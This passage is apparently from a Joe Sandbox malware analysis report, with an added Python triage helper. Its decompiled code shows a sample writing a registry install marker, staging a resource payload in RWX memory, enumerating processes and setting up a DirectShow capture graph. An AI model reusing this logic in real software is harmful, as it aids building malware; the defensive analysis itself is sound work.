                                                                    						E02D21936(_t10);                       // resource contents consumed here (not resolved in this listing)
                                                                    					}
                                                                    				}
                                                                    				return 0;
                                                                    			}

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,02E5CBF0,00000208,00000000,00000000,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A58
                                                                    • IsUserAnAdmin.SHELL32 ref: 02D21A5E
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                      • Part of subcall function 02D219C9: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
                                                                      • Part of subcall function 02D219C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
                                                                      • Part of subcall function 02D219C9: lstrlenW.KERNEL32(02E5CBF0,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A12
                                                                      • Part of subcall function 02D219C9: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
                                                                      • Part of subcall function 02D219C9: RegCloseKey.ADVAPI32(?,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A31
                                                                    • FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A87
                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A91
                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?), ref: 02D21A9B
                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 02D21AA2
                                                                      • Part of subcall function 02D21936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000), ref: 02D21974
                                                                      • Part of subcall function 02D21936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21988
                                                                      • Part of subcall function 02D21936: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21996
                                                                      • Part of subcall function 02D21936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D219A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$CloseFindOpenProcessTokenVirtuallstrlen$AdminAllocChangeCreateCurrentDirectoryFileInformationLoadLockModuleNameNotificationProtectSizeofUserValueWindows
                                                                    • String ID: WM_DSP
                                                                    • API String ID: 88121427-506093727
                                                                    • Opcode ID: c71db1a19e6e0abdca08b5a3673541217b20658578dfb8aae4721c67568e5c4e
                                                                    • Instruction ID: fd18556d9c1d334837fb267f0183f9f285352250306e2b8377e565095f2c9361
                                                                    • Opcode Fuzzy Hash: c71db1a19e6e0abdca08b5a3673541217b20658578dfb8aae4721c67568e5c4e
                                                                    • Instruction Fuzzy Hash: 29F04F31A802706BE63127B26C0CF5B3E5DEFB5754F164824F80AE6341DA24CD19CA70
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
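
Added here as a worked triage example; it is not part of the Joe Sandbox report and not code from the analysed sample. It parses the "APIs" bullet lines in the format used above (the argument list is the stack at call time, so the rules index it positionally, and `?` marks a slot the sandbox could not recover) and tags the values that matter when reading this function: RWX memory protections, the HKCU key and value written, the admin and integrity-level checks, the resource access and the cmd.exe path. The regex, the tag names and the rule set are this example's own assumptions; `SAMPLE` is copied from the API list of the function at 0x02D21A3C above.

```python
"""Triage helper for the "APIs" bullet lists of a Joe Sandbox function dump.

Added example (not the report's or the sample's code).  Parses the two line
shapes the report uses,
    • Api.MODULE(arg,arg,...), ref: ADDR
    • Part of subcall function F: Api.MODULE(arg,...), ref: ADDR
and tags argument values that matter for triage.  Rules and tag names are
this example's own assumptions.
"""
import re
from typing import Dict, List, Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PAGE_EXECUTE_READWRITE = 0x40    # flProtect / flNewProtect
HKEY_CURRENT_USER = 0x80000001   # predefined hKey


def _hex(arg: str) -> Optional[int]:
    """Stack slots print as 8-digit hex; '?' and inline strings are not numbers."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_api_line(line: str) -> Optional[Dict]:
    m = API_LINE.match(line)
    if m is None:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": m.group("ref").upper(), "subcall": m.group("sub")}


def flag_call(call: Dict) -> List[str]:
    api, args = call["api"], call["args"]

    def hex_at(i: int) -> Optional[int]:
        return _hex(args[i]) if i < len(args) else None

    tags = []
    if api == "VirtualAlloc" and hex_at(3) == PAGE_EXECUTE_READWRITE:    # (addr, size, type, protect)
        tags.append("rwx_memory")
    if api == "VirtualProtect" and hex_at(2) == PAGE_EXECUTE_READWRITE:  # (addr, size, newprot, &old)
        tags.append("rwx_memory")
    if api in ("RegOpenKeyExW", "RegCreateKeyExW") and hex_at(0) == HKEY_CURRENT_USER:
        tags.append("hkcu_key:" + (args[1] if len(args) > 1 else "?"))  # (hKey, lpSubKey, ...)
    if api == "RegSetValueExW":
        tags.append("reg_value_write")
    if api == "IsUserAnAdmin":
        tags.append("admin_check")
    # Joe annotates the TokenInformationClass slot, e.g. 00000014(TokenIntegrityLevel)
    if api == "GetTokenInformation" and any("TokenIntegrityLevel" in a for a in args):
        tags.append("integrity_check")
    if api in ("FindResourceW", "LoadResource", "SizeofResource", "LockResource"):
        tags.append("resource_access")
    if any(a.lower().endswith("cmd.exe") for a in args):
        tags.append("cmd_exe_path")
    return tags


def triage(report_text: str) -> Dict[str, List[str]]:
    """Map each tag to the call sites (ref addresses) that raised it."""
    out: Dict[str, List[str]] = {}
    for line in report_text.splitlines():
        call = parse_api_line(line)
        if call is not None:
            for tag in flag_call(call):
                out.setdefault(tag, []).append(call["ref"])
    return out


def capabilities(tags: Dict[str, List[str]]) -> List[str]:
    """Combine per-call tags into the behaviours an analyst would write up."""
    caps = []
    if "resource_access" in tags and "rwx_memory" in tags:
        caps.append("payload carried in a PE resource and staged in RWX memory")
    if any(t.startswith("hkcu_key:") for t in tags) and "reg_value_write" in tags:
        caps.append("per-user registry key written (install marker)")
    if "admin_check" in tags or "integrity_check" in tags:
        caps.append("checks its own privilege level before acting")
    if "cmd_exe_path" in tags:
        caps.append("builds a path to System32\\cmd.exe")
    return caps


# Copied from the report's API list for the function at 0x02D21A3C (11 of its 19 lines).
SAMPLE = r"""
• GetModuleFileNameW.KERNEL32(00000000,02E5CBF0,00000208,00000000,00000000,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A58
• IsUserAnAdmin.SHELL32 ref: 02D21A5E
  • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
  • Part of subcall function 02D219C9: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
  • Part of subcall function 02D219C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
  • Part of subcall function 02D219C9: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
• FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A87
• LockResource.KERNEL32(00000000,?,?,?,?,02D157B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 02D21AA2
  • Part of subcall function 02D21936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000), ref: 02D21974
  • Part of subcall function 02D21936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21988
  • Part of subcall function 02D21936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,02D21AB4,?,?,?,02D157B9,?,00000000,00000000), ref: 02D219A4
"""

if __name__ == "__main__":
    found = triage(SAMPLE)
    for tag, refs in sorted(found.items()):
        print(f"{tag:28s} {' '.join(refs)}")
    for cap in capabilities(found):
        print("=>", cap)
```

The positional rules only hold where the sandbox resolved the real arguments; a `?` in the protect or hKey slot yields no tag rather than a guess, which is the safe failure mode for a triage script. Paste the whole "APIs" block of any function into `SAMPLE` (or read it from a file) to get the same per-address tags for it.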

                                                                    C-Code - Quality: 68%
                                                                    			// CRT assertion hook: when __ecx (the asserted condition) is zero, the sample resolves
                                                                    			// MessageBoxA at run time, shows the "Assert" box (0x2010 = MB_ICONERROR | MB_TASKMODAL)
                                                                    			// and terminates with ExitProcess(1). Otherwise it just returns the resolved pointer.
                                                                    			E02D15CA3(void* __ecx) {
                                                                    				_Unknown_base(*)()* _t2;
                                                                    				void* _t4;
                                                                    
                                                                    				_t4 = __ecx;
                                                                    				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                                                    				if(_t4 == 0) {
                                                                    					if(_t2 != 0) {
                                                                    						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                                                    					}
                                                                    					ExitProcess(1);
                                                                    				}
                                                                    				return _t2;
                                                                    			}

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(USER32.DLL,?,02D202E1,?,745D0770,00000000), ref: 02D15CAB
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 02D15CB7
                                                                    • ExitProcess.KERNEL32 ref: 02D15CDB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressExitLibraryLoadProcProcess
                                                                    • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                                    • API String ID: 881411216-1361702557
                                                                    • Opcode ID: 6a1dffd3aa7b0f0f11ac8898351fb4a235a2aacccea797cb5b1069c3e3d8f705
                                                                    • Instruction ID: fdcef744b8dad763464a0d4946da0dacc6c85f809844cf9666f87511ebaea090
                                                                    • Opcode Fuzzy Hash: 6a1dffd3aa7b0f0f11ac8898351fb4a235a2aacccea797cb5b1069c3e3d8f705
                                                                    • Instruction Fuzzy Hash: F3D02B34BC03E07AFA2016B13C0AF547B046BB0F0DF004400BE03E1381C7918C6CD910
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			// Pure-virtual-call handler (the CRT _purecall equivalent): same run-time MessageBoxA
                                                                    			// pattern as the assertion hook, then unconditional ExitProcess(1).
                                                                    			E02D15F6A() {
                                                                    				_Unknown_base(*)()* _t2;
                                                                    
                                                                    				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                                                    				if(_t2 != 0) {
                                                                    					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                                                    				}
                                                                    				ExitProcess(1);
                                                                    			}

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(USER32.DLL), ref: 02D15F6F
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 02D15F7B
                                                                    • ExitProcess.KERNEL32 ref: 02D15F9A
                                                                    Strings
                                                                    • PureCall, xrefs: 02D15F8A
                                                                    • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 02D15F8F
                                                                    • USER32.DLL, xrefs: 02D15F6A
                                                                    • MessageBoxA, xrefs: 02D15F75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressExitLibraryLoadProcProcess
                                                                    • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                                    • API String ID: 881411216-4134947204
                                                                    • Opcode ID: 19a1a5bdcc80d28e7ac5158d1ed4f98568c67903859a9fdd446be5411d36371e
                                                                    • Instruction ID: cc0e2645a9f474af9e4fa991a3b1a29602f6f698511bb3fe387d1fc7c0535e6c
                                                                    • Opcode Fuzzy Hash: 19a1a5bdcc80d28e7ac5158d1ed4f98568c67903859a9fdd446be5411d36371e
                                                                    • Instruction Fuzzy Hash: 96D09230BD03A16EF62026B27C0AF18BB14AB75E0AF014810BE06E43C1CAD09C6C9965
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040BB8E,0040BB8E,?,?,?,00412363,00000001,00000001,34E85006), ref: 004121A3
                                                                    • __alloca_probe_16.LIBCMT ref: 004121CB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,00412363,00000001,00000001,34E85006,?,?,?), ref: 0041220C
                                                                    • __alloca_probe_16.LIBCMT ref: 0041228F
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,34E85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 004122EC
                                                                    • __freea.LIBCMT ref: 004122F9
                                                                      • Part of subcall function 0040DD7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 0040DDAC
                                                                    • __freea.LIBCMT ref: 00412302
                                                                    • __freea.LIBCMT ref: 00412327
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: efec82012d2cd9db57c8827eafeaba0415fb012290e3458dfa75d1294d147459
                                                                    • Instruction ID: efc175e8e115c704ad55d3fe277ea89c601e30820dd367b8e6caf77afcf072de
                                                                    • Opcode Fuzzy Hash: efec82012d2cd9db57c8827eafeaba0415fb012290e3458dfa75d1294d147459
                                                                    • Instruction Fuzzy Hash: 7F51117260020AAFDB208F65CD41EFF3AA9EF44750F15026AFD04E7250D7B8DCA09668
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E02D20D24(void* __ecx, void* __edx, void* __eflags) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				intOrPtr _v32;
                                                                    				int _v36;
                                                                    				intOrPtr _v40;
                                                                    				int _v44;
                                                                    				char _v568;
                                                                    				long _v596;
                                                                    				char _v600;
                                                                    				void* _v604;
                                                                    				char _v1644;
                                                                    				intOrPtr _t49;
                                                                    				int _t54;
                                                                    				int _t58;
                                                                    				int _t74;
                                                                    				int _t78;
                                                                    				int _t90;
                                                                    				void* _t92;
                                                                    				void* _t113;
                                                                    				void* _t114;
                                                                    				void* _t116;
                                                                    				void* _t118;
                                                                    				signed int _t120;
                                                                    				void* _t121;
                                                                    				signed int _t123;
                                                                    				void* _t124;
                                                                    				intOrPtr* _t125;
                                                                    				void* _t126;
                                                                    
                                                                    				_t126 = __eflags;
                                                                    				_t113 = __edx;
                                                                    				_t92 = __ecx;
                                                                    				E02D11052( &_v600, 0, 0x228); // memset: zero the PROCESSENTRY32W body after dwSize
                                                                    				_t125 = _t124 + 0xc;
                                                                    				_v604 = 0x22c; // PROCESSENTRY32W.dwSize = sizeof(PROCESSENTRY32W) (0x22C = 556)
                                                                    				_v36 = 0;
                                                                    				_t49 = 5;
                                                                    				_v32 = _t49;
                                                                    				_v40 = _t49;
                                                                    				E02D116E3( &_v44, _t126);
                                                                    				_t114 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS: enumerate every process
                                                                    				if(_t114 == 0xffffffff) { // INVALID_HANDLE_VALUE: snapshot failed, fall through to cleanup
                                                                    					L14:
                                                                    					E02D1131A(_t92, __eflags,  &_v44);
                                                                    					_t54 = _v44;
                                                                    					__eflags = _t54;
                                                                    					if(_t54 != 0) {
                                                                    						_t120 =  *(_t54 - 4); // element count is stored in the dword before the vector data
                                                                    						_t116 = _t120 * 0xc + _t54; // each record is 12 bytes: {pid, exe name, image path}
                                                                    						__eflags = _t120;
                                                                    						if(_t120 != 0) {
                                                                    							do {
                                                                    								_t116 = _t116 - 0xc;
                                                                    								E02D11416(_t116);
                                                                    								_t120 = _t120 - 1;
                                                                    								__eflags = _t120;
                                                                    							} while (_t120 != 0);
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_push( &_v604);
                                                                    					_t58 = Process32FirstW(_t114);
                                                                    					_t128 = _t58;
                                                                    					if(_t58 != 0) {
                                                                    						do {
                                                                    							_v16 = _v596; // PROCESSENTRY32W.th32ProcessID (offset 8)
                                                                    							_v12 = 0;
                                                                    							_v8 = 0;
                                                                    							E02D132FF( &_v12, _t113,  &_v568); // wide string built from szExeFile (offset 36)
                                                                    							// 0x1410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION
                                                                    							_t121 = OpenProcess(0x1410, 0, _v596);
                                                                    							__eflags = _t121 - 0xffffffff;
                                                                    							// OpenProcess returns NULL on failure, never INVALID_HANDLE_VALUE, so this branch is
                                                                    							// dead in practice: for a process it cannot open, a NULL handle reaches GetModuleFileNameExW,
                                                                    							// which then fails and yields the "-" placeholder in the else branch below.
                                                                    							if(_t121 == 0xffffffff) {
                                                                    								E02D13437( &_v8, E02D135E5( &_v28, "-"));
                                                                    								E02D15EA5(_v28);
                                                                    								_t34 =  &_v28;
                                                                    								 *_t34 = _v28 & 0x00000000;
                                                                    								__eflags =  *_t34;
                                                                    							} else {
                                                                    								E02D11052( &_v1644, 0, 0x410);
                                                                    								_t125 = _t125 + 0xc;
                                                                    								_t78 =  &_v1644;
                                                                    								__imp__GetModuleFileNameExW(_t121, 0, _t78, 0x208); // PSAPI: full image path of the main module, or "-" if unavailable
                                                                    								__eflags = _t78;
                                                                    								if(_t78 == 0) {
                                                                    									E02D13437( &_v8, E02D135E5( &_v24, "-"));
                                                                    									E02D15EA5(_v24);
                                                                    									_t29 =  &_v24;
                                                                    									 *_t29 = _v24 & 0x00000000;
                                                                    									__eflags =  *_t29;
                                                                    								} else {
                                                                    									E02D13437( &_v8, E02D135E5( &_v20,  &_v1644));
                                                                    									E02D15EA5(_v20);
                                                                    									_v20 = _v20 & 0x00000000;
                                                                    								}
                                                                    								CloseHandle(_t121);
                                                                    							}
                                                                    						// append one 12-byte record {pid, exe name, image path} to the result vector (_v44)
                                                                    						_t125 = _t125 - 0xc;
                                                                    						_t122 = _t125;
                                                                    						 *_t125 = _v16;
                                                                    						E02D1362D(_t122 + 4,  &_v12);
                                                                    						E02D1362D(_t122 + 8,  &_v8);
                                                                    							E02D115C0( &_v44);
                                                                    							E02D11416( &_v16);
                                                                    							_t74 = Process32NextW(_t114,  &_v604);
                                                                    							_push(0);
                                                                    							_pop(0);
                                                                    							__eflags = _t74;
                                                                    						} while (__eflags != 0);
                                                                    						CloseHandle(_t114);
                                                                    						goto L14;
                                                                    					} else {
                                                                    						CloseHandle(_t114);
                                                                    						E02D1131A(_t92, _t128,  &_v44);
                                                                    						_t90 = _v44;
                                                                    						if(_t90 != 0) {
                                                                    							_t123 =  *(_t90 - 4);
                                                                    							_t118 = _t123 * 0xc + _t90;
                                                                    							if(_t123 != 0) {
                                                                    								do {
                                                                    									_t118 = _t118 - 0xc;
                                                                    									E02D11416(_t118);
                                                                    									_t123 = _t123 - 1;
                                                                    								} while (_t123 != 0);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t92;
                                                                    			}

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D20D6A
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02D20D83
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D20D8E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 02D20DF8
                                                                    • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 02D20E2E
                                                                    • CloseHandle.KERNEL32(00000000,00000000,02D24C14), ref: 02D20E81
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D20EE5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D20EF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                                                    • String ID:
                                                                    • API String ID: 3514491001-0
                                                                    • Opcode ID: bbc234f1daeb9f4f1a3767f29b40e3da66314736ace99ab827bdbe7982b83640
                                                                    • Instruction ID: e1144130051f66632618e8846c22cef7e489149530f4961acb94c3ba665beb14
                                                                    • Opcode Fuzzy Hash: bbc234f1daeb9f4f1a3767f29b40e3da66314736ace99ab827bdbe7982b83640
                                                                    • Instruction Fuzzy Hash: DB519172D01129ABDB10EBA4DC88AEEBB79EF64715F010565E505B3780EB309E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E02D22D0A(signed int __ecx, signed int _a4) {
                                                                    				intOrPtr _v38;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr _v48;
                                                                    				void* _v112;
                                                                    				char _v128;
                                                                    				intOrPtr _v132;
                                                                    				char _v200;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr* _t54;
                                                                    				intOrPtr* _t58;
                                                                    				intOrPtr* _t60;
                                                                    				intOrPtr* _t71;
                                                                    				signed int _t76;
                                                                    				intOrPtr* _t78;
                                                                    				intOrPtr* _t79;
                                                                    				intOrPtr* _t80;
                                                                    				intOrPtr* _t85;
                                                                    				signed int _t91;
                                                                    				intOrPtr* _t96;
                                                                    				intOrPtr* _t97;
                                                                    				intOrPtr* _t104;
                                                                    				signed int _t107;
                                                                    				intOrPtr* _t111;
                                                                    				intOrPtr* _t112;
                                                                    				intOrPtr* _t113;
                                                                    				intOrPtr* _t118;
                                                                    				void* _t119;
                                                                    				void* _t120;
                                                                    				void* _t121;
                                                                    
                                                                    				_t76 = __ecx;
                                                                    				__imp__CoInitialize(0);
                                                                    				_t1 = _t76 + 0x18; // 0x70d040
                                                                    				_t111 = _t1;
                                                                    				__imp__CoCreateInstance(0x2d245a0, 0, 1, 0x2d27410, _t111);
                                                                    				_t78 =  *_t111;
                                                                    				if(_t78 != 0) {
                                                                    					_t2 = _t76 + 0x1c; // 0x70d044
                                                                    					_t104 = _t2;
                                                                    					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x2d24580, _t104);
                                                                    					_t79 =  *_t104;
                                                                    					if(_t79 != 0) {
                                                                    						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                                                    						_t4 = _t76 + 0x20; // 0x70d048
                                                                    						_t112 = _t4;
                                                                    						if(_t112 != 0) {
                                                                    							_t49 = E02D22A6B(_a4, _t112);
                                                                    						}
                                                                    						if( *_t112 != 0) {
                                                                    							_t6 = _t76 + 0x24; // 0x70d04c
                                                                    							_t113 = _t6;
                                                                    							__imp__CoCreateInstance(0x2d245f0, 0, 1, 0x2d27400, _t113);
                                                                    							_t80 =  *_t113;
                                                                    							if(_t80 != 0) {
                                                                    								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
                                                                    								_t54 =  *_t113;
                                                                    								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
